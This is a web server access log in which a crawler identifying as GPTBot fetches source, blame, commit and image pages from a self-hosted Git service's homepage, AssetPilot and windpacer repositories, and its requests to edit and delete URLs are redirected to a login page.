"/windpacer/homepage/blame/branch/main/html/README.md" [Client 74.7.227.38] [Length 11197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" -[17/Feb/2026:15:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" -[17/Feb/2026:15:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13436] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" -[17/Feb/2026:15:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15185] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15368] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" -[17/Feb/2026:15:38:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13527] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" -[17/Feb/2026:15:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10561] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:38:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/README.md" -[17/Feb/2026:15:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/README.md" -[17/Feb/2026:15:38:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/README.md" -[17/Feb/2026:15:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/README.md" -[17/Feb/2026:15:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" -[17/Feb/2026:15:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 48273] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 24902] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 25421] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" -[17/Feb/2026:15:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:15:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11136] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11061] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:15:38:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15918] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:15:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:15:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:15:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18632] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" -[17/Feb/2026:15:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:15:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:15:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:15:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" -[17/Feb/2026:15:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" -[17/Feb/2026:15:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:15:38:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] 